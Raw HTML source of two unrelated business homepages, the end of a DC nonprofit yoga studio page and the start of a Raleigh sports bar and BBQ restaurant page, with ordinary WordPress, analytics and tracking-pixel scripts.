reasons. Our teachers are trained in a wide range of unique yoga traditions, so please try classes with a few different teachers using our <a href="https://www.yogadistrict.com/the-yoga/">intro-pass for new students</a> to <a href="https://www.yogadistrict.com/the-yoga/what-class-is-right-for-you/">find the style you&#8217;re looking for</a>.</p> <p><strong><a href="https://www.yogadistrict.com/the-studios/">Learn more about Yoga District studios and our nonprofit mission here&#8230;</a></strong> </div> </div> <div class="homeBox"> <h2>What's Happening</h2> <img src="/wp-content/uploads/2011/01/roughline.png" style="margin-top:-10px; margin-bottom:10px;"> <div id="innerBox" style="height: 420px; overflow-x: hidden; overflow-y: auto;"> <div class="dates-and-time group"> <div> <div></div> </div> <div> <p><strong><a href="https://clients.mindbodyonline.com/classic/ws?studioid=2070&amp;stype=-8&amp;sView=day&amp;sLoc=0&amp;sTrn=100001554&amp;date=05/26/19">DC Dharma Day</a></strong> @ George Washington University, May 26th</p> <p><a href="https://clients.mindbodyonline.com/classic/ws?studioid=2070&amp;stype=-8&amp;sView=day&amp;sLoc=0&amp;date=05/18/19"><strong>Yin Yoga and Reiki</strong></a> @ 14th St, May 18th</p> </div> <p><strong>Retreats</strong></p> <p><a href="https://clients.mindbodyonline.com/classic/ws?studioid=2070&amp;stype=-8&amp;sView=day&amp;sLoc=0&amp;sTrn=100000011&amp;date=06/07/19"><strong>Summer Meditation Retreat</strong></a> with Jayanti @ Chesapeake Bay, June 7-9th</p> <div> <p><strong>Upcoming Yoga Training</strong></p> </div> <div> <p><span class="s1"><a href="https://clients.mindbodyonline.com/classic/ws?studioid=2070&amp;stype=-101&amp;sView=day&amp;sLoc=0&amp;date=07/06/19"><strong>-200 Hour Summer Extended Teacher Training Session starting July 6th</strong> </a>@ Washington, DC -$2000 Super Early Bird, $2216 Early Bird + $180 book fee</span></p> <p><span class="s1"><a href="https://clients.mindbodyonline.com/classic/ws?studioid=2070&amp;stype=-101&amp;sView=day&amp;sLoc=0&amp;date=07/16/19"><strong>-200 Hour Summer Intensive Teacher Training Session starting July 16th</strong> </a>@ Washington, DC -$2000 Super Early Bird, $2216 Early Bird + $180 book fee</span></p> <p>&#8211;<strong><a href="https://clients.mindbodyonline.com/classic/ws?studioid=2070&amp;stype=-101&amp;sView=day&amp;sLoc=0&amp;sTrn=100000085">Sri Mama Prenatal Training</a></strong> 4 Weekends starting September 13th @ I St &#8211; $1500 or $375 for the first weekend only</p> <p class="p1"><span class="s1">Need help? <a href="https://www.yogadistrict.com/the-fees/account-issue-faqs-and-resolution-form/"><strong>Accounts Issue FAQ&#8217;s page here.</strong></a></span></p> </div> </div> </div> </div> <div class="homeBox last"> <h2>The Buzz</h2> <img src="/wp-content/uploads/2011/01/roughline.png" style="margin-top:-10px; margin-bottom:10px;"> <div id="innerBox" style="height: 420px; overflow-x: hidden; overflow-y: auto;"> <p style="text-align: left;"><img class="alignleft size-full wp-image-541" style="border: 0pt none; margin: 6px;" title="washington city paper yoga best studio" src="https://www.yogadistrict.com/wp-content/uploads/2011/01/washington-city-paper-yoga-best-studio.jpg" alt="" width="27" height="36" />Rated &#8220;Best Yoga Studio&#8221; by the Washington City Paper 7+ years</p> <p><!--washington city paper from 2010 - 2016--></p> <p style="text-align: left;"><a href="https://www.yogadistrict.com/wp-content/uploads/2011/01/express-best-of-2013.png"><img class=" wp-image-4173 alignleft" src="https://www.yogadistrict.com/wp-content/uploads/2011/01/express-best-of-2013.png" alt="express-best-of-2013" width="60" height="30" srcset="https://www.yogadistrict.com/wp-content/uploads/2011/01/express-best-of-2013.png 290w, https://www.yogadistrict.com/wp-content/uploads/2011/01/express-best-of-2013-150x77.png 150w" sizes="(max-width: 60px) 100vw, 60px" /></a>Voted &#8220;Best Yoga Studio&#8221; in DC by the Express for 5+ years</p> <p style="text-align: left;"><img class="alignleft size-full wp-image-47" title="yelp4" src="https://www.yogadistrict.com/wp-content/uploads/2011/08/yelp4.png" alt="" width="38" height="37" border="0" /></p> <p style="text-align: left;">Highest-rated yoga studio in DC on yelp.com for over a year.</p> <p style="text-align: left;"><a href="https://www.yogadistrict.com/wp-content/uploads/2011/01/cbs-logo.png"><img class=" wp-image-3912 alignleft" src="https://www.yogadistrict.com/wp-content/uploads/2011/01/cbs-logo.png" alt="cbs-logo" width="50" height="29" /></a> &#8220;Yoga District is DC&#8217;s premiere yoga studio.&#8221;</p> <p style="text-align: left;"><a title="affordable yoga washington dc " href="https://www.yogadistrict.com/wp-content/uploads/2011/01/washington-post-yoga.jpg"><img class="size-medium wp-image-540 alignleft" style="margin: 3px; border: 0pt none;" title="washington post yoga" src="https://www.yogadistrict.com/wp-content/uploads/2011/01/washington-post-yoga-300x54.jpg" alt="" width="112" height="20" srcset="https://www.yogadistrict.com/wp-content/uploads/2011/01/washington-post-yoga-300x55.jpg 300w, https://www.yogadistrict.com/wp-content/uploads/2011/01/washington-post-yoga.jpg 301w" sizes="(max-width: 112px) 100vw, 112px" /></a></p> <p>&#8220;&#8230;Teachers as dedicated as any in Washington&#8230; [with] classes costing about half what many studios in the city charge&#8221;</p> <p><a title="affordable yoga washington dc " href="https://www.yogadistrict.com/wp-content/uploads/2011/01/washington-post-yoga.jpg"><img class="size-medium wp-image-540 alignleft" style="margin: 3px; border: 0pt none;" title="washington post yoga" src="https://www.yogadistrict.com/wp-content/uploads/2011/01/washington-post-yoga-300x54.jpg" alt="" width="112" height="20" srcset="https://www.yogadistrict.com/wp-content/uploads/2011/01/washington-post-yoga-300x55.jpg 300w, https://www.yogadistrict.com/wp-content/uploads/2011/01/washington-post-yoga.jpg 301w" sizes="(max-width: 112px) 100vw, 112px" /></a>&#8230;Nonprofit studio Yoga District is one of the main forces behind the &#8220;yoga activist&#8221; outreach effort in the area (Washington Post)</p> <p><a href="https://www.yogadistrict.com/student-community-and-feedback/"><strong>See more reviews or contribute your own here&#8230;</strong></a></p> <p>&nbsp;</p> </div> </div> </div> <!-- end home boxes --> <!-- END HOME CONTENT --> <!-- SLIDER SETTINGS --> <script type="text/javascript"> $(window).load(function() { $('#slider').nivoSlider({ effect:'fade', //Specify sets like: 'fold,fade,sliceDown' slices:15, animSpeed:500, pauseTime:5000, startSlide:0, //Set starting Slide (0 index) directionNav:true, //Next & Prev directionNavHide:true, //Only show on hover controlNav:true, //1,2,3... controlNavThumbs:false, //Use thumbnails for Control Nav controlNavThumbsFromRel:false, //Use image rel for thumbs controlNavThumbsSearch: '.jpg', //Replace this with... controlNavThumbsReplace: '_thumb.jpg', //...this in thumb Image src keyboardNav:true, //Use left & right arrows pauseOnHover:true, //Stop animation while hovering manualAdvance:false, //Force manual transitions captionOpacity:0.8, //Universal caption opacity beforeChange: function(){}, afterChange: function(){}, slideshowEnd: function(){} //Triggers after all slides have been shown }); }); </script> </div> <!-- END CONTENT --> </div> <!-- END WRAPPER --> <!-- BEGIN FOOTER --> <div id="footer"> <div style="position:absolute; top:-3504px;"> </div> <div style="width:960px; margin: 0 auto; position:relative;"> <a href="#" id="showHide" > Show/Hide footer actions </a> </div> <div id="footerActions" > <div id="footerActionsInner"> <div id="twitter"> <a href="://twitter.com/yogadistrict" class="action"> Follow us! </a> <div id="latest"> <div id="tweet"> <div><h2><span class='twitterwidget twitterwidget-title'>Twitter: yogadistrict</span></h2><ul><li><span class='entry-content'>Escape the city and unwind. Join Jayanti and your fellow yogis, June 7-9 for an unforgettable summer weekend of yo… <a href="https://t.co/QP3rvYZyol">https://t.co/QP3rvYZyol</a></span> <span class='entry-meta'><span class='time-meta'><a href="http://twitter.com/yogadistrict/statuses/1128801236004814848">about 17 hours ago</a></span></span></li></ul></div> <div id="twitter_update_list"></div> </div> <div id="tweetBottom"></div> </div> </div> <!--script type="text/javascript" src="://twitter.com/javascripts/blogger.js"></script> <script type="text/javascript" src="s://api.twitter.com/1.1/statuses/user_timeline.json?screen_name=yogadistrict&include_rts=1&Callback2&count=yogadistrict&include_rts=1&callback=twitterCallback2&count=1"> </script> <script type="text/javascript" src="://twitter.com/javascripts/blogger.js"></script> <script type="text/javascript" src="://api.twitter.com/1/statuses/user_timeline.json?count=1&exclude_replies=true&screen_name=yogadistrict&callback=twitterCallback2"></script--> <div id="signup"><a name="signup"></a> <table cellspacing="5" width="500"> <tr> <td style="padding-right:10px; padding-top:3px;"> <span style="color: #666; display: inline; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; font-style: italic; font-weight: normal; height: 0px; line-height: 16px;"> Stay informed about schedule changes and get special offers! Our newsletter includes updates about our yoga outreach efforts through Yoga Activist.</span> <td style="padding-top:5px;"> <form name="ccoptin" action="//visitor.r20.constantcontact.com/d.jsp?llr=mzi6hlcab&p=oi&m=1102036509484&sit=8r87s8ddb&f=faa3bfc2-bf12-4be5-809d-5d86aac5810e" target="_blank" method="post" style="margin-bottom:3;"> <input id="signup" name="ea" type="text" value="&nbsp;join our mailing list" onclick="this.value='';" onfocus="this.select()" onblur="this.value=!this.value?'join our mailing list':this.value;" /> <br /> <input id="submitinput" name="go" type="submit" value="Sign-Up" /> <input type="hidden" name="llr" value="mzi6hlcab"> <input type="hidden" name="m" value="1102036509484"> <input type="hidden" name="p" value="oi"> </form> </td> </tr> </table> </div> </div> </div> <div id="footerWidgets"> <div id="footerWidgetsInner"> <!-- BEGIN FOOTER WIDGET --> <div class="boxFooter"> <div class="textwidget"><a href="https://www.yogadistrict.com/the-studios/dupontyoga/">Dupont Circle Studio</a><br/> 1635 Connecticut Avenue NW *Very Top Floor* Washington, DC 20009 <br><br><hr><br> <a href="https://www.yogadistrict.com/the-studios/14th-street-yoga-dc/">14th Street Studio</a><br/> 1910 14th Street NW. Units 1 & 4 Washington, DC 20009 </div> </div><div class="boxFooter"> <div class="textwidget"><a href="https://www.yogadistrict.com/the-studios/bloomingdale-yoga-dc/">Bloomingdale Studio</a><br/> 1830 1st Street NW Washington, DC 20001 <br><br> <hr> <br><a href="https://www.yogadistrict.com/i-st-studio-dc/">I Street Studio</a><br/> 1922 I Street NW<br> 2nd + 3rd Floors<br> Washington, DC 20006 </div> </div><div class="boxFooter"> <div class="textwidget"><a href="https://www.yogadistrict.com/the-studios/h-street-dc/">H Street Studio</a><br/> 500 H St., Rear Entrance, NE Washington, DC 20002 <br><br> <hr> <br><a href="https://www.yogadistrict.com/the-studios/glover-park-studio-dc/">Glover Park Studio</a><br/> 2319 Wisconsin Ave NW<br> Washington, DC 20007</div> </div><div class="boxFooter"> <div class="textwidget"><a href="https://www.yogadistrict.com/the-studios/columbia-heights-studio/">Petworth Studio</a><br/> 3905 Georgia Ave NW Washington, DC 20011 <br><br> <hr><a href="https://www.yogadistrict.com/the-fees/account-issue-faqs-and-resolution-form/">Contact Yoga District</a> <br/> All info is subject to change, like life! :) </div> </div><div style="float:left; clear:both;"> <p style="color: #666; display: inline; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; font-style: italic; font-weight: normal;"> Design donated by <a href="://www.davidonate.com/">David Onate</a></p></div> <div id="SlideDeck-8628-frame" class="slidedeck-frame slidedeck_frame slidedeck-frame-8628 lens-classic show-overlay-hover display-nav-hover content-source-custom sd2-show-author sd2-show-author-avatar sd2-show-title sd2-show-excerpt sd2-show-readmore sd2-custom sd2-small sd2-light default-nav-styles sd2-show-spine-titles slidedeck-ie-11 no-vertical-slide slidedeck-viewport" style="width:2px;height:5px;max-width:100%;" data-sd2-lazy-load-padding="1"><dl id="SlideDeck-8628" class="slidedeck slidedeck-8628" style="width: 2px; height: 5px; position: relative; overflow: hidden;"><dt class="sd2-spine-title-color sd2-spine-background-color sd2-custom-title-font sd2-spinePosition-horizontal active spine spine_1 last" style="height: 35px; position: absolute; z-index: 3; left: 0px; width: 5px; padding: 0px 10px; transform: rotate(270deg); transform-origin: 18px 0px 0px; text-align: right; top: -13px; margin-left: -18px; display: none;"><span class="sd2-spine-title"></span><div class="index" style="position: absolute; z-index: 2; display: block; width: 35px; height: 35px; text-align: center; bottom: -18px; left: 20px; transform: rotate(90deg); transform-origin: 18px 0px 0px;">1</div><span class="sd2-spine-inner">&nbsp;</span><div class="index" style="position: absolute; z-index: 2; display: block; width: 35px; height: 35px; text-align: center; bottom: -18px; left: 20px; transform: rotate(90deg); transform-origin: 18px 0px 0px;">1</div></dt><dd itemscope="" itemtype="://schema.org/ImageObject" style="transform-origin: 50% 50% 0px; left: 0px; z-index: 1; position: absolute; height: 5px; width: 2px; margin: 0px; padding-left: 0px;" class="no-image no-excerpt has-title custom-layout-caption custom-caption-position-top sd2-image-scaling-cover slide-type-html slide-source-custom slide active slide_1 last" data-thumbnail-src="" data-slide-id="8629"><div class="sd2-content-wrapper " style="display:block !important;"></div> </dd></dl><div class="slidedeck-overlays" data-for="SlideDeck-8628"><a href="#slidedeck-overlays" class="slidedeck-overlays-showhide">Overlays<span class="open-icon"></span><span class="close-icon"></span></a><span class="slidedeck-overlays-wrapper"><input type="hidden" id="overlay_pinterest" class="overlay_pinterest" name="overlay_pinterest" value="0"></span></div><a class="deck-navigation horizontal prev" href="#prev-horizontal" style="display: inline;"><span>Previous</span></a><a class="deck-navigation horizontal next" href="#next-horizontal" style="display: inline;"><span>Next</span></a><a class="deck-navigation vertical prev" href="#prev-vertical"><span>Previous</span></a><a class="deck-navigation vertical next" href="#next-vertical"><span>Next</span></a></div></div> <!-- END FOOTER --> <!-- END FOOTER WIDGETS --> </div> </div> </div> <!-- END MAINWRAPPER --> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-21156717-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script><script src="//my.hellobar.com/559d4685846f7f278a954155a49974f2efdc259e.js" type="text/javascript" async="async"></script> <div class="mtsnb mtsnb-shown mtsnb-top mtsnb-fixed" id="mtsnb-10866" data-mtsnb-id="10866" style="background-color:#d35151;color:#ffffff;"> <style type="text/css"> .mtsnb { position: fixed; -webkit-box-shadow: 0 3px 4px rgba(0, 0, 0, 0.05);box-shadow: 0 3px 4px rgba(0, 0, 0, 0.05);} .mtsnb .mtsnb-container { width: 1080px; font-size: 15px;} .mtsnb a { color: #ffffff;} .mtsnb .mtsnb-button { background-color: #ffffff;} </style> <div class="mtsnb-container-outer"> <div class="mtsnb-container mtsnb-clearfix"> <div class="mtsnb-button-type mtsnb-content"><span class="mtsnb-text"></span><a href="https://clients.mindbodyonline.com/classic/ws?studioid=2070&#038;stype=40&#038;prodId=116" class="mtsnb-link">Intro Offer: $35 for one month of unlimited classes! </a></div> </div> </div> </div> <div style="display:none"> </div> <link rel='stylesheet' id='slidedeck-lens-half-moon-css' href='https://www.yogadistrict.com/wp-content/plugins/slidedeck3-personal/lenses/half-moon/lens.css?ver=3.9' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var thickboxL10n = {"next":"Next >","prev":"< Prev","image":"Image","of":"of","close":"Close","noiframes":"This feature requires inline frames. You have iframes disabled or your browser does not support them.","loadingAnimation":"https:\/\/www.yogadistrict.com\/wp-includes\/js\/thickbox\/loadingAnimation.gif"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/iphorm-form-builder/js/jquery.fileupload.min.js?ver=9.18.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var iphormL10n = {"error_submitting_form":"An error occurred submitting the form","upload_too_many":"You have attempted to queue too many files","upload_file_type_not_allowed":"This file type is not allowed","upload_file_too_big":"This file exceeds the maximum upload size","invalid_response":"The response from the server was invalid or malformed","ajax_error":"Ajax error","plugin_url":"https:\/\/www.yogadistrict.com\/wp-content\/plugins\/iphorm-form-builder","ajax_url":"https:\/\/www.yogadistrict.com\/wp-admin\/admin-ajax.php","preview_no_submit":"The form cannot be submitted in the preview"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js?ver=1.10.0'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js?ver=3.5.1'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js?ver=1.7.2'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js?ver=2.2.1'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js?ver=2.1.2'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js?ver=0.1'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/google-drive-wp-media/js/lightbox.js?ver=2.4.4'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/google-drive-wp-media/js/justifiedGallery.js?ver=2.4.4'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/google-drive-wp-media/js/script.js?ver=2.4.4'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/slidedeck3-personal/js/jail.js?ver=3.9'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/slidedeck3-personal/js/slidedeck.jquery.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/slidedeck3-personal/js/slidedeck-public.js?ver=3.9'></script> <script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=1316526300'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/slidedeck3-personal/lenses/half-moon/lens.js?ver=3.9'></script> <script type="text/javascript"> var slideDeck2URLPath = "https://www.yogadistrict.com/wp-content/plugins/slidedeck3-personal"; var slideDeck2iframeByDefault = false; </script> <script type="text/javascript" src="https://www.yogadistrict.com/wp-content/plugins/slidedeck3-personal/sources/custom/slides/image/slide.js?v=1.0"></script><link rel="stylesheet" type="text/css" href="https://www.yogadistrict.com/wp-content/plugins/slidedeck3-personal/sources/custom/slides/image/slide.css?v=1.0" /><script type="text/javascript" src="https://www.yogadistrict.com/wp-content/plugins/slidedeck3-personal/lenses/half-moon/lens.js"></script><script type="text/javascript">jQuery("#SlideDeck-3868").slidedeck( {"auto_height":false,"activeCorner":false,"hideSpines":true,"keys":false,"scroll":false,"touch":false,"continueScrolling":false,"touchThreshold":{"x":287,"y":89},"start":1,"autoPlay":true,"autoPlayInterval":10000,"cycle":true,"slideTransition":"slide","speed":2000,"transition":"swing","index":true,"image_scaling":"cover"} ).vertical({"speed":2000,"scroll":false,"continueScrolling":false});</script><style type="text/css" id="slidedeck-footer-styles">#SlideDeck-3868 {font-family:sans-serif;}#SlideDeck-3868 .slide-title,#SlideDeck-3868-frame .sd2-custom-title-font,#SlideDeck-3868 .sd2-slide-title{font-family:sans-serif;font-weight:bold;}#SlideDeck-3868-frame .accent-color{color:#ffffff}#SlideDeck-3868-frame .activeSlide .half-moon-nav-num-wrapper{background-color:#ffffff}#SlideDeck-3868-frame .accent-color-background{background-color:#ffffff}#SlideDeck-3868-frame .sd2-content-wrapper{color:#ffffff}.slidedeck-custom-css-wrapper-3868 .sd2-vertical-center-inner { margin-bottom:15px; } .slidedeck-custom-css-wrapper-3868 .sd2-slide-text { background-color: rgba(0,0,0,0.6); !important; padding: 15px; border-radius: 25px; }</style><script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'124397291',post:'0',tz:'-5',srv:'www.yogadistrict.com'} ]); _stq.push([ 'clickTrackerInit', '124397291', '0' ]); </script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <title>Sports Bar and Grill in Raleigh NC | Best BBQ Restaurant | Best Food Catering Services</title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="stylesheet" type="text/css" media="all" href="http://www.backyardbistro.com/wp-content/themes/byb/style.css" /> <link rel="pingback" href="http://www.backyardbistro.com/xmlrpc.php" /> <link href="https://plus.google.com/u/0/111625399565452991271/about?rel=author" /> <meta name="msvalidate.01" content="39456B88A91284764AF87B96961B2CF3" /> <meta name="HandheldFriendly" content="true"> <meta name="MobileOptimized" content="240"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" /> <meta http-equiv="Pragma" content="no-cache" /> <meta http-equiv="Expires" content="0" /> <!-- All in One SEO Pack 2.12 by Michael Torbert of Semper Fi Web Design[68,122] --> <meta name="description" content="Check Out the Best Sports Bar and Grill in Raleigh for casual dining. Backyard Bistro is a Full Service Family Style Restaurant and Bar located near PNC Arena." /> <meta name="keywords" content="Take out, BBQ Ribs, award winning burgers, sandwiches, Happy Hour Specials, Food Catering Services, Corporate Catering, BBQ Catering, Restaurant Catering, Event Catering, Local Commercial Caterers, Top Barbecue Restaurant, Raleigh NC, Sports Bar and Grill, raleigh sports bar, BBQ Restaurant, Food Catering, restaurant catering, raleigh restaurants, Top Place to Eat" /> <link rel="canonical" href="http://www.backyardbistro.com/" /> <script type="text/javascript" > window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date; ga('create', 'UA-44841299-2', { 'cookieDomain': 'www.backyardbistro.com' } ); // Plugins ga('require', 'outboundLinkTracker'); ga('send', 'pageview'); </script> <script async src="https://www.google-analytics.com/analytics.js"></script> <script async src="http://www.backyardbistro.com/wp-content/plugins/all-in-one-seo-pack/public/js/vendor/autotrack.js"></script> <!-- /all in one seo pack --> <link rel='dns-prefetch' href='//www.backyardbistro.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Backyard Bistro &raquo; Feed" href="http://www.backyardbistro.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Backyard Bistro &raquo; Comments Feed" href="http://www.backyardbistro.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.backyardbistro.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://www.backyardbistro.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='http://www.backyardbistro.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='twentyten-block-style-css' href='http://www.backyardbistro.com/wp-content/themes/twentyten/blocks.css?ver=20181018' type='text/css' media='all' /> <script type='text/javascript' src='http://www.backyardbistro.com/wp-content/themes/byb/js/jquery-1.12.3.min.js'></script> <script type='text/javascript' src='http://www.backyardbistro.com/wp-content/themes/byb/js/flip-51.js?ver=5.1.1'></script> <link rel='https://api.w.org/' href='http://www.backyardbistro.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.backyardbistro.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.backyardbistro.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel='shortlink' href='http://www.backyardbistro.com/' /> <link rel="alternate" type="application/json+oembed" href="http://www.backyardbistro.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.backyardbistro.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.backyardbistro.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.backyardbistro.com%2F&#038;format=xml" /> <link rel="alternate" type="application/rss+xml" title="Backyard Bistro &raquo; Eventlist Feed" href="http://www.backyardbistro.com/feed/event-list" /><style type="text/css" id="custom-background-css"> body.custom-background { background-color: #000000; } </style> <script type="text/javascript"> function newWin(url,name, width, height) {window.open(url,name,'scrollbars=yes,resizable=no, width=' + width + ',height='+height);} </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-44841299-2']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- Facebook Pixel Code --> <script> !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '1890420721209090'); // Insert your pixel ID here. fbq('track', 'PageView'); </script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1890420721209090&ev=PageView&noscript=1" /></noscript> <!-- DO NOT MODIFY --> <!-- End Facebook Pixel Code --> </head> <body class="home page-template page-template-onecolumn-nofill page-template-onecolumn-nofill-php page page-id-7 custom-background"> <div id="bricks"> <div id="wrapper" class="hfeed"> <div id="header"> <div id="masthead"> <div id="branding" role="banner"> <div id="headerdesktop"> <img src="http://www.backyardbistro.com/images/header_image_desktop_blank_10yr.png" /> <div style="position: absolute; top: 65px; left: 510px;"> <p class="opencontact">Open daily at 11:00 am until<br />1235 Hurricane Alley Way, Raleigh NC<br /><a href="tel:19198516203" style="color: #fff;">(919) 851-6203</a><br /><a href="mailto:[email protected]" style="color: #fff;">[email protected]</a></p> </div> </div> <div id="headermid"> <img src="http://www.backyardbistro.com/images/header_image_mid_blank_10yr.png" /> <div style="position: absolute; top: 40px; left: 45%;"> <p class="opencontact">Open daily at 11:00 am until<br />1235 Hurricane Alley Way, Raleigh NC<br /><a href="tel:19198516203" style="color: #fff;">(919) 851-6203</a><br /><a href="mailto:[email protected]" style="color: #fff;">[email protected]</a></p> </div></div> <div id="headermobile"> <img src="http://www.backyardbistro.com/images/header_image_mobile_blank_10yr.png" /> <div style="position: absolute; top: 48vw; left: 3%;"> <p class="opencontact">Open daily at 11:00 am until<br />1235 Hurricane Alley Way, Raleigh NC<br /><a href="tel:19198516203" style="color: #fff;">(919) 851-6203</a><br /><a href="mailto:[email protected]" style="color: #fff;">[email protected]</a></p> </div></div> </div><!-- #branding --> <div id="access" 